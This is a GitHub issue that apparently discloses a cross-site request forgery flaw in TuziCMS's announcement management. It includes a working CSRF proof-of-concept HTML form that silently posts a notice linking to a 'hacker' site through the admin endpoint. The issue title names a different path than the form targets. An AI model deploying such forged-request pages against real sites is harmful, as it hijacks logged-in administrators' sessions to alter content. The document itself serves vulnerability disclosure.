Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

tuzicms /tuzicms-master/index.php/manage/user/do_add Cross-station Request Forgery exists in the place of announcement management under conventional management #4

Open
HLHai opened this issue Sep 3, 2019 · 0 comments

Comments

@HLHai
Copy link

HLHai commented Sep 3, 2019

0x00

Cross-station Request Forgery exists in the place of announcement management under conventional management
url:/tuzicms-master/index.php/manage/user/do_add
image

0x01

payload:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/tuzicms-master/index.php/manage/notice/do_add" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="notice&#95;title" value="hacker" />
      <input type="hidden" name="notice&#95;url" value="http&#58;&#47;&#47;www&#46;hacker&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

0x02 end

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant